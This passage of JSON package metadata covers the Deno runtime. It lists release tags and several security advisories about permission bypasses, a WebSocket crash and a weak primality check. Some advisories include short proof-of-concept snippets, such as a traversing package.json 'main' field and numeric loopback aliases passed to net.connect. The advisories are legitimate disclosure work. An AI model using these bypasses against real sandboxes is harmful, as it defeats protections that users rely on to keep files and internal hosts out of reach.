:null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-09-08T12:03:07.767Z","dependent_packages_count":5,"downloads":632468,"downloads_period":"total","dependent_repos_count":1,"rankings":{"downloads":6.1427024605159986,"dependent_repos_count":16.5399651664312,"dependent_packages_count":6.221036266331809,"stargazers_count":0.0022405114340766853,"forks_count":0.05750646014130159,"docker_downloads_count":3.229660605608035,"average":5.365518578410403},"purl":"pkg:cargo/deno","advisories":[{"uuid":"GSA_kwCzR0hTQS14MnFjLWNtaDktZjRoZs4ABZDK","url":"https://github.com/advisories/GHSA-x2qc-cmh9-f4hf","title":"Deno: Denial of service via non-ASCII bytes in WebSocket response headers","description":"## Summary\n\nA Deno program that opens a client `WebSocket` connection could be crashed by\nthe remote server. While handling the WebSocket handshake response, Deno parsed\nthe `Sec-WebSocket-Protocol` and `Sec-WebSocket-Extensions` response headers in\na way that assumed their bytes were always printable ASCII. A response header\ncontaining non-visible-ASCII bytes (`0x80`-`0xFF`) caused a panic that aborted\nthe entire Deno process.\n\n## Details\n\nWhen establishing a client WebSocket connection, Deno read the\n`Sec-WebSocket-Protocol` and `Sec-WebSocket-Extensions` headers from the\nserver's `101 Switching Protocols` response and converted them to strings\nwithout handling the failure case. `HeaderValue::to_str()` returns an error for\nany value containing bytes outside the visible-ASCII range, so a header carrying\nsuch bytes triggered an unrecoverable error during conversion.\n\nBecause the client initiates the outbound connection, the handshake response is\nfully controlled by the server. A server that returns bytes such as `0xFF 0xFE`\nin either header could therefore crash any client that connected to it.\n\nThis is purely an availability issue. There is no information disclosure and no\nmemory-safety impact; the only effect is termination of the current process.\n\n## Impact\n\nRemote denial of service. Any Deno application that establishes WebSocket\nconnections to untrusted or potentially-compromised endpoints could be\nterminated by the remote peer. Exploitation requires the victim application to\ninitiate the outbound WebSocket connection. An attacker who controls the\nWebSocket endpoint, or who can man-in-the-middle a plaintext `ws://` connection,\ncould trigger the crash. The effect is confined to crashing the process that\nopened the connection.\n\n## Patch\n\nThe issue is fixed in Deno `2.7.5`. The header values are now parsed with\ngraceful fallbacks: values that cannot be represented as ASCII strings are\nskipped instead of aborting the process. A regression test covers a server that\nreturns non-ASCII bytes in `Sec-WebSocket-Protocol`.\n\nUsers should upgrade to Deno `2.7.5` or later.\n\n## Workarounds\n\nUntil you can upgrade, only connect to trusted WebSocket endpoints and prefer\n`wss://` (TLS) over `ws://`, which prevents a network man-in-the-middle from\ninjecting malicious header bytes into the handshake response.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-17T18:48:18.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":4.3,"cvss_vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L","references":["https://github.com/denoland/deno/security/advisories/GHSA-x2qc-cmh9-f4hf","https://github.com/advisories/GHSA-x2qc-cmh9-f4hf"],"source_kind":"github","identifiers":["GHSA-x2qc-cmh9-f4hf","CVE-2026-55517"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-17T19:00:08.492Z","updated_at":"2026-08-29T17:01:27.474Z","epss_percentage":0.00315,"epss_percentile":0.23669,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14MnFjLWNtaDktZjRoZs4ABZDK","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS14MnFjLWNtaDktZjRoZs4ABZDK","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.7.5","vulnerable_version_range":"\u003c= 2.7.4"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS14MnFjLWNtaDktZjRoZs4ABZDK/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS04eHBxLWNqY2YtM3doOc4ABY0p","url":"https://github.com/advisories/GHSA-8xpq-cjcf-3wh9","title":"Deno: Permission Bypass via Unicode Normalization Mismatch on macOS (APFS)","description":"## Summary\n\nDeno's permission system enforces filesystem and execution restrictions by\ncomparing the requested path against the path supplied to `--deny-read`,\n`--deny-write`, `--deny-run`, or `--deny-ffi`. On macOS, that comparison was\ndone at the raw-byte level while the APFS filesystem treats different Unicode\nspellings of the same name as the same file.\n\nThat means a program could reach a denied path by spelling it differently than\nthe deny rule. For example, with `--deny-read=/secrets/passwörter.txt`, a\nscript could still read the file by opening `/secrets/passwo\\u0308rter.txt`\n(NFD instead of NFC), or `/SECRETS/PASSWÖRTER.txt` (different case, since\ndefault APFS volumes are case-insensitive). Other forms include ligature\ncharacters (`ﬁ` vs `fi`, `ﬀ` vs `ff`, …) and German `ß` vs `ss`.\n\nThe denied path and the requested path differed at the byte level, so Deno's\npermission check passed; the kernel then resolved them to the same inode and\nserved the file anyway. The same flaw affected `--deny-write`, `--deny-run`,\nand `--deny-ffi`, which share the same path-comparison code.\n\n## Am I affected?\n\nYou are potentially affected if **all** of the following are true:\n\n1. You run Deno on **macOS** (the issue is specific to APFS path-equivalence\n   rules; Linux and Windows are not affected by this variant).\n2. You rely on `--deny-read`, `--deny-write`, `--deny-run`, or `--deny-ffi`\n   as a security boundary against less-trusted code — a dependency, plugin,\n   or attacker-controlled input.\n3. The protected path contains characters that have alternate Unicode\n   spellings — most commonly accented characters (`é`, `ñ`, `ö`, …), German\n   `ß`, or Latin ligatures — or you rely on case-sensitivity on a default\n   APFS volume.\n\nIf you only run fully trusted code, or your deny rules cover paths that are\npure ASCII with no case-sensitive aliases, you are not exposed to this\nspecific bypass.\n\n## Impact\n\nA program running with broad `--allow-read` (or `--allow-write` /\n`--allow-run` / `--allow-ffi`) but with `--deny-*` carve-outs for specific\npaths could read, write, execute, or load via FFI those denied paths by\nreferring to them through a Unicode- or case-equivalent spelling. The sandbox\nmodel on macOS was weaker than the flags suggested.\n\n## Workaround\n\nIf you cannot upgrade immediately:\n\n- Prefer `--allow-*` allowlists over `--deny-*` denylists. Allow rules match\n   against the original specifier, so an attacker-supplied alternate spelling\n   will not match a path you didn't explicitly grant.\n- Do not rely on case-sensitivity of paths on macOS for security boundaries;\n   default APFS volumes are case-insensitive.\n\n## Fix\n\nOn macOS, Deno now normalizes both the deny-rule path and the requested path\nto NFC and applies Unicode case folding before comparing them. This matches\nhow APFS resolves paths at the inode level, so byte-different but equivalent\nspellings are now rejected by the same deny rule.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-16T19:11:52.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.3,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-8xpq-cjcf-3wh9","https://nvd.nist.gov/vuln/detail/CVE-2026-49401","https://github.com/advisories/GHSA-8xpq-cjcf-3wh9"],"source_kind":"github","identifiers":["GHSA-8xpq-cjcf-3wh9","CVE-2026-49401"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T20:00:08.861Z","updated_at":"2026-08-29T17:01:28.612Z","epss_percentage":0.00197,"epss_percentile":0.094,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04eHBxLWNqY2YtM3doOc4ABY0p","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS04eHBxLWNqY2YtM3doOc4ABY0p","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.7.14","vulnerable_version_range":"\u003c= 2.7.13"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS04eHBxLWNqY2YtM3doOc4ABY0p/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05Njh3LXhmcXctdnA5cc4ABY0o","url":"https://github.com/advisories/GHSA-968w-xfqw-vp9q","title":"Deno: BYONM module resolution allows `package.json` main path traversal to bypass `--allow-read` restrictions","description":"## Summary\n\nWhen Deno was run in BYONM mode (`nodeModulesDir: \"manual\"`), the module resolver did not validate that a package's resolved entrypoint stayed within its `node_modules/\u003cpkg\u003e/` directory. A malicious `package.json` whose `main` field contained `..` segments was able to resolve to an arbitrary path on disk, and the resolver then read that file without consulting the `--allow-read` allowlist. This let a `require(\"evil-pkg\")` call return the contents of a file that a direct `Deno.readTextFileSync(...)` call would have been blocked from reading.\n\n## Details\n\nIn BYONM mode, Deno resolved npm packages directly from a user-managed `node_modules` tree. Resolution of `require(\"pkg\")` proceeded by reading `pkg/package.json`, taking the `main` field, joining it to the package directory, and loading the result as a module.\n\nThe path joined from `main` was not constrained to the package root. A `package.json` such as:\n\n```json\n{ \"main\": \"../../../secret.json\" }\n```\n\nresolved to `node_modules/pkg/../../../secret.json`, escaping `node_modules` entirely. The BYONM permission check accepted any path that contained a `node_modules` component and did not reject `..` traversal, so the resolved path was loaded without a read-permission check.\n\nBecause resolution loaded JSON entrypoints by parsing their contents and returning them through `require`, this exposed the contents of arbitrary `.json` files reachable by the OS user to the requiring code, even when `--allow-read` had been narrowed to a specific directory.\n\nThe same file accessed via `Deno.readTextFileSync` was correctly blocked. The bug was that module resolution did not enforce the same read-permission boundary that the filesystem APIs enforced.\n\n## Proof of concept\n\nThe reporter supplied a self-contained PoC. Layout:\n\n```\n/tmp/deno_byonm_poc/\n├── app/\n│   ├── deno.json            (BYONM enabled)\n│   ├── exploit.ts           (require(\"evil-pkg\"))\n│   └── node_modules/\n│       └── evil-pkg/\n│           └── package.json (main: \"../../../secret.json\")\n└── secret.json              (outside --allow-read scope)\n```\n\nRun:\n\n```bash\ndeno run --no-prompt --allow-read=/tmp/deno_byonm_poc/app exploit.ts\n```\n\nObserved:\n\n- `Deno.readTextFileSync(\"/tmp/deno_byonm_poc/secret.json\")` — blocked, as\n  expected.\n- `require(\"evil-pkg\")` — returned the parsed contents of `secret.json`,\n  bypassing the read allowlist.\n\nA control run with BYONM disabled (`--no-config`) blocked the `require` call.\n\n## Impact\n\nThe vulnerability allowed a hostile npm package installed under a BYONM `node_modules` to read JSON files outside the directories granted via `--allow-read`, up to the privileges of the OS user running Deno. In practice this exposed configuration and credential files (`.env.json`, cloud credentials, package lockfiles, etc.) that the user had deliberately excluded from the read scope.\n\nThe vulnerability did not grant any capability beyond what the OS user already held, did not affect runs that granted unrestricted `--allow-read`, and required the user to have installed and then required a hostile package, i.e. an existing supply-chain compromise. The reason it warranted a security advisory rather than a routine bug fix is that Deno's permission model\npromised that `--allow-read=\u003cscope\u003e` was a hard boundary *even over untrusted npm code*, and that promise was broken.\n\nNot affected:\n\n- Runs without BYONM (default npm resolution went through a separate code\n  path that rejected the traversal).\n- Runs with full `--allow-read` (no boundary to bypass).\n- Non-JSON entrypoints, in practice — `.js`/`.cjs`/`.mjs` targets executed\n  rather than exposing file contents, which already implied attacker code\n  execution within the granted permission set.\n\n## Workarounds\n\nUsers on unpatched versions could mitigate by:\n\n- Avoiding BYONM mode (`nodeModulesDir: \"manual\"`) for projects that depended\n  on untrusted packages.\n- Auditing `package.json` `main` fields in `node_modules` for `..` segments\n  before running.\n- Granting `--allow-read` only when the read scope already covered every file\n  the OS user could see (in which case there was no boundary to bypass and no\n  additional exposure).","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-16T19:11:26.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":5.5,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-968w-xfqw-vp9q","https://nvd.nist.gov/vuln/detail/CVE-2026-49406","https://github.com/advisories/GHSA-968w-xfqw-vp9q"],"source_kind":"github","identifiers":["GHSA-968w-xfqw-vp9q","CVE-2026-49406"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T20:00:08.861Z","updated_at":"2026-08-29T17:01:28.613Z","epss_percentage":0.00176,"epss_percentile":0.07085,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05Njh3LXhmcXctdnA5cc4ABY0o","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05Njh3LXhmcXctdnA5cc4ABY0o","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.7.12","vulnerable_version_range":"\u003c= 2.7.11"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05Njh3LXhmcXctdnA5cc4ABY0o/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS12OGZ3LTg1cjgtNW0yM84ABY0n","url":"https://github.com/advisories/GHSA-v8fw-85r8-5m23","title":"Deno: Node TCPWrap numeric hostname aliases bypass --deny-net resolved-IP deny checks","description":"## Summary\n\nDeno's network permission model is designed so that `--deny-net` rules apply to the **resolved IP address** of a destination, not just the literal string supplied by the caller. That means `--deny-net=127.0.0.1` (or `--deny-net=127.0.0.0/8`) is expected to block any attempt to reach loopback, regardless of how the hostname is spelled.\n\nOn affected versions, the Node.js compatibility TCP path checked the permission against the **original hostname string** before resolution and then did not re-check after resolution. A caller could therefore pass a numeric alias of an IP address (for example the decimal integer `2130706433` or the hex form `0x7f000001`, both of which resolve to `127.0.0.1`) and reach the denied destination through `node:net.connect` or `node:http.request`'s `{ host, port }` options form.\n\nThe native `Deno.connect()`, `fetch()`, and URL-string variants of `node:http.request(\"http://...\")` were not affected, because they either re-checked permissions after resolution or normalized the hostname through the URL parser before checking.\n\n## Proof of concept\n\nRun on Deno `2.7.14`, with a local TCP listener on `127.0.0.1:\u003cPORT\u003e`:\n\n```js\nimport net from \"node:net\";\n\n// --allow-net + --deny-net=127.0.0.0/8\n// (or even --deny-net=127.0.0.1:\u003cPORT\u003e)\nnet.connect({ host: \"2130706433\", port: PORT });     // CONNECTED ❌\nnet.connect({ host: \"0x7f000001\", port: PORT });     // CONNECTED ❌\nnet.connect({ host: \"127.0.0.1\",  port: PORT });     // denied ✅\n```\n\nThe same primitive reached the loopback HTTP listener through `node:http` when the destination was passed as options rather than as a URL string:\n\n```js\nimport http from \"node:http\";\n\n// options-form host — bypasses the deny rule on affected versions\nhttp.request({ hostname: \"2130706433\", port: PORT, path: \"/\" }).end();\n\n// URL-string form — correctly denied (URL parser normalizes the host)\nhttp.request(`http://2130706433:${PORT}/`).end();\n```\n\nThe server-side log showed the bypassed requests arriving from `127.0.0.1` with the numeric alias preserved in the `Host` header.\n\n## Impact\n\nA program that intentionally allows broad outbound network access but uses `--deny-net` to carve out protected destinations, typically loopback, private/internal ranges, or cloud-instance metadata IPs, could be made to reach those denied destinations from less-trusted code (a dependency, plugin, or attacker-controlled input) that funnels through `node:net.connect({ host })` or `node:http.request({ hostname })`.\n\nThe CVSS vector reflects this as a local-attack-vector, permissions-required confidentiality impact: the attacker needs to be able to run code inside the Deno process, and the demonstrated primitive is \"reach an explicitly denied IP.\" It does not by itself exfiltrate data or execute code; the further impact depends on what the now-reachable endpoint exposes.\n\nThe confirmed scope is **IPv4 numeric hostname aliases** reaching a denied resolved IP through the Node TCPWrap / options-host path. URL strings, `node:http2`, `undici`, and IPv6 numeric/mapped-address variants were not exhaustively tested by the reporter.\n\n## Not affected\n\n- Programs that do not use `--deny-net` at all (the bug is specifically about deny rules being bypassed; allow rules were always checked against the original string).\n- Native Deno networking APIs (`Deno.connect`, `Deno.connectTls`, `fetch`, ...), these already re-checked permissions after resolution as of PR #33203.\n- URL-string callers such as `fetch(\"http://2130706433/\")` or `node:http.request(\"http://2130706433/\")`, the URL parser normalized the hostname to its dotted-quad form before the   permission check ran.\n- Calls that do not provide `host`/`hostname` (e.g. connecting by IP literal or by a name that the deny rule already matches verbatim).\n\n## Workarounds\n\nIf you cannot upgrade immediately, reduce exposure by:\n\n- **Preferring an `--allow-net` allowlist over a `--deny-net` denylist.** An allowlist denies numeric aliases by default because they don't match the listed hostnames; only the destinations you've explicitly permitted can be reached.\n- **Validating untrusted host input** before passing it to `node:net.connect` / `node:http.request`. Reject hostnames that are purely decimal integers (`/^\\d+$/`) or begin with `0x`, as these are the alias forms exploited by the bypass.\n- **Avoiding the Node options-host path for sensitive calls** in favour of URL-string forms, which are normalized by the URL parser before the permission check.","origin":"UNSPECIFIED","severity":"MODERATE","published_at":"2026-06-16T19:09:46.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":6.5,"cvss_vector":"CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-v8fw-85r8-5m23","https://nvd.nist.gov/vuln/detail/CVE-2026-49411","https://github.com/advisories/GHSA-v8fw-85r8-5m23"],"source_kind":"github","identifiers":["GHSA-v8fw-85r8-5m23","CVE-2026-49411"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T20:00:08.861Z","updated_at":"2026-08-29T17:01:28.614Z","epss_percentage":0.00158,"epss_percentile":0.05117,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12OGZ3LTg1cjgtNW0yM84ABY0n","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS12OGZ3LTg1cjgtNW0yM84ABY0n","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.8.0","vulnerable_version_range":"\u003c= 2.7.14"}],"purl":"pkg:cargo/deno"}],"related_packages_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS12OGZ3LTg1cjgtNW0yM84ABY0n/related_packages","related_advisories":[]},{"uuid":"GSA_kwCzR0hTQS05eGc0LXFobTQtZzQzd84ABY0m","url":"https://github.com/advisories/GHSA-9xg4-qhm4-g43w","title":"Deno: Miller-Rabin Primality Test Allows Zero Rounds","description":"## Summary\n\n`node:crypto.checkPrime(candidate[, options][, callback])` and `crypto.checkPrimeSync(candidate[, options])` ran no Miller-Rabin rounds at all when the caller left `options.checks` at its default of `0`. In that mode, the only test applied to the candidate was trial division by the primes up to `17,863`. Any composite whose smallest prime factor exceeds that bound — for example the product of two primes just above it, such as `17,881 × 17,891` — was reported as `true` (\"probably prime\").\n\nThe same divergence affected the lower-level `op_node_check_prime` / `op_node_check_prime_bytes` paths that the polyfill calls into.\n\nNode.js itself does not have this problem: it forwards `checks = 0` to OpenSSL's `BN_check_prime`, which substitutes a sensible default number of rounds based on the candidate's bit length (per FIPS 186-4 Appendix C.3 Table C.1). Deno's Rust implementation had no equivalent fallback, so `count = 0` meant \"skip the loop entirely.\"\n\n## Affected APIs\n\n- `crypto.checkPrime(candidate)` (callback form, default options)\n- `crypto.checkPrime(candidate, { checks: 0 }, callback)`\n- `crypto.checkPrimeSync(candidate)` (default options)\n- `crypto.checkPrimeSync(candidate, { checks: 0 })`\n\nCallers who explicitly passed `checks \u003e= 1` were less affected, the loop ran the number of rounds they asked for, but were still receiving fewer rounds than Node would have applied for the same bit length. With the patched version they get at least the FIPS minimum.\n\n## Not affected\n\n- Deno's prime *generation* (`crypto.generatePrime`, `crypto.generatePrimeSync`, and the DH parameter generation path). Those routes go through `Prime::generate_with_options` in `ext/node_crypto/primes.rs`, which hardcodes `20` Miller-Rabin rounds and never reads a user-controlled `checks` value, so the bug never reached them.\n- Any other Deno-internal use of primality testing — `is_probably_prime` is not called from elsewhere in the runtime with `count = 0`. \n- Web Crypto (`crypto.subtle.*`), which uses entirely separate code paths and does not expose a primality test.\n\n## Impact\n\nThe realistic exposure is application-level: a Deno program that calls `crypto.checkPrime` (or its sync variant) with default options to validate an externally-supplied bignum, for example checking a peer-provided Diffie-Hellman prime, validating a prime read from configuration, or sanity-checking an RSA factor, will accept crafted composites as prime. The composite is trivial to construct: any product of two primes greater than `17,863` works.\n\nDownstream consequences depend on what the program does with the \"verified\" prime. If the prime is fed into a key exchange, signature verification, or factorization-style check, the security guarantees of that protocol collapse to whatever the attacker engineered into the composite.\n\nThe CVSS impact is bounded by the requirement that the victim application both (a) calls `checkPrime` with default options and (b) acts on the result for security-relevant input it does not control.\n\n## Reproduction\n\n```ts\nimport { checkPrimeSync } from \"node:crypto\";\n\n// 17881 and 17891 are both prime and both above the trial-division\n// ceiling used by Deno's implementation.\nconst composite = 17881n * 17891n;\n\n// Affected versions print `true`; the patched version prints `false`.\nconsole.log(checkPrimeSync(composite));\n```\n\nThe same result is reproducible from Rust against the internal helper:\n\n```rust\nuse num_bigint::BigInt;\nlet composite = BigInt::from(17881u32) * BigInt::from(17891u32);\nassert!(!is_probably_prime(\u0026composite, 0)); // fails on affected versions\n```\n\n## Fix\n\nPR [#34391](https://github.com/denoland/deno/pull/34391) introduces a\nhelper `min_miller_rabin_rounds_for_bits(bits)` that returns the FIPS\n186-4 Appendix C.3 round counts, matching the defaults OpenSSL uses\ninside `BN_check_prime`. `is_probably_prime` then clamps the loop bound\nto `count.max(min_miller_rabin_rounds_for_bits(n.bits()))`. The\nprobabilistic loop now always executes, regardless of what `checks`\nvalue the caller supplied, with a round count strong enough to keep the\nfalse-positive probability below 2^-80. Callers that pass a larger\nexplicit `checks` still get exactly that many rounds.\n\nUnit tests under `ext/node_crypto/primes.rs` cover the\n`17,881 × 17,891` case, a larger 64-bit composite, and the FIPS lookup\ntable itself.\n\n## Workarounds\n\nIf you cannot upgrade immediately:\n\n- **Pass an explicit `checks` value** when calling `crypto.checkPrime` or `crypto.checkPrimeSync`. A value of `64` is conservative for any reasonable bit length and keeps the loop running.\n- **Do not rely on `crypto.checkPrime` to validate attacker-influenced bignums** in security-critical paths until you are on the patched release.","origin":"UNSPECIFIED","severity":"HIGH","published_at":"2026-06-16T19:08:55.000Z","withdrawn_at":null,"classification":"GENERAL","cvss_score":7.4,"cvss_vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N","references":["https://github.com/denoland/deno/security/advisories/GHSA-9xg4-qhm4-g43w","https://github.com/denoland/deno/pull/34391","https://github.com/advisories/GHSA-9xg4-qhm4-g43w"],"source_kind":"github","identifiers":["GHSA-9xg4-qhm4-g43w","CVE-2026-49440"],"repository_url":null,"blast_radius":0.0,"created_at":"2026-06-16T20:00:08.861Z","updated_at":"2026-08-29T17:01:28.614Z","epss_percentage":0.00237,"epss_percentile":0.14537,"api_url":"https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS05eGc0LXFobTQtZzQzd84ABY0m","html_url":"https://advisories.ecosyste.ms/advisories/GSA_kwCzR0hTQS05eGc0LXFobTQtZzQzd84ABY0m","packages":[{"ecosystem":"cargo","package_name":"deno","versions":[{"first_patched_version":"2.8.1","vulnerable_version_range":"\u003c= 